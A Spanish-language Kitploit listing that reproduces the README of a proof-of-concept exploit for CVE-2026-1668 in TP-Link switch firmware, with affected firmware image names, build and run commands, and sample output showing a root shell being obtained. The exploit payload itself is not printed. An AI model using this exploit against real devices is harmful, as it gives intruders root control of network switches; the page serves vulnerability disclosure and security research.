Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2026-1668-poc — Prueba de concepto de exploit para CVE-2026-1668 en el firmware del switch TP-Link, que entrega un payload MIPS que proporciona una shell de root en dispositivos vulnerables. | Kitploit
Herramientas/GitHubGitHub/wuyou6956-glitch/cve-2026-1668-poc
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónIngeniería InversaSeguridad de Hardware e IoTDesarrollo de PayloadsAnálisis de Firmware

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Explotación de Binarios
GitHubwuyou6956-glitch/cve-2026-1668-poc

cve-2026-1668-poc

Prueba de concepto de exploit para CVE-2026-1668 en el firmware del switch TP-Link, que entrega un payload MIPS que proporciona una shell de root en dispositivos vulnerables.

Ver Repositorio
hace 2 díasAún no revisado

Exploit de prueba de concepto para CVE-2026-1668

Este es un exploit de prueba de concepto para CVE-2026-1668. Está destinado únicamente a fines educativos. Por favor, no intentes explotar sistemas que no sean de tu propiedad o para los que no tengas permiso explícito de explotar.

Esta prueba de concepto fue desarrollada contra una imagen de firmware con el siguiente hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.

Nombres de firmwares que se sabe que coinciden con ese hash (no exhaustivo):

  • SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
  • SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
  • SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
  • SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
  • SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
  • SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
  • SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
  • SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
  • SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
  • SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
  • TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin

Es probable que las versiones de firmware anteriores también sean vulnerables, pero pueden requerir cambios menores en el payload del exploit.

Puedes encontrar una explicación de cómo funciona el payload en esta entrada de blog.

Compilación

Se requiere una cadena de herramientas GCC para MIPS Linux para compilar el payload. En Ubuntu 24.04, se puede instalar con sudo apt install gcc-mips-linux-gnu.

$ make

Ejecución

Este exploit debe ejecutarse antes de que el servidor HTTP haya atendido su primera solicitud (es decir, en un arranque limpio).

$ ./run.sh

El script debería dejarte en un shell de root. Si no es así, el exploit ha fallado.

[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json

{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc # 
Descargar herramienta